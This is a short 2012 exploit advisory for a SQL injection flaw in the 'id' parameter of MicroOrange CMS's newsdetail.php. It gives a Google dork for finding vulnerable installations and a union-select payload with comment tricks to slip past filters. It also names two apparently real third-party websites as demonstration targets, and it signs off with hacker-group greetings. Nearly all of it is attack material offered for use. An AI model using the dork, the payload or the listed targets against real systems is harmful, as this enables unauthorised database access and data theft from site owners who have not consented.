# Exploit Title: MicroOrange cms Sql Injection Vulnerability # # Google Dork: Intext:"Powered by MicroOrange Technologies" # # Date: 08/29/2012 # # Author: Crim3R # # Site : Http://Ajaxtm.com/ # # Vendor Home : http://www.microorange.net/ # # Tested on: all # ================================== [+] id parametr in newsdetail.php is Vulnerable to sql injection [+] target/newsdetail.php?id=[id][+/*!union*/+/*!select*/+1,2,3,4,5,6--] D3m0: http://www.sunilhitech.com/newsdetail.php?id=75' http://www.greenlifeindia.org/newsdetail.php?id=3' ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369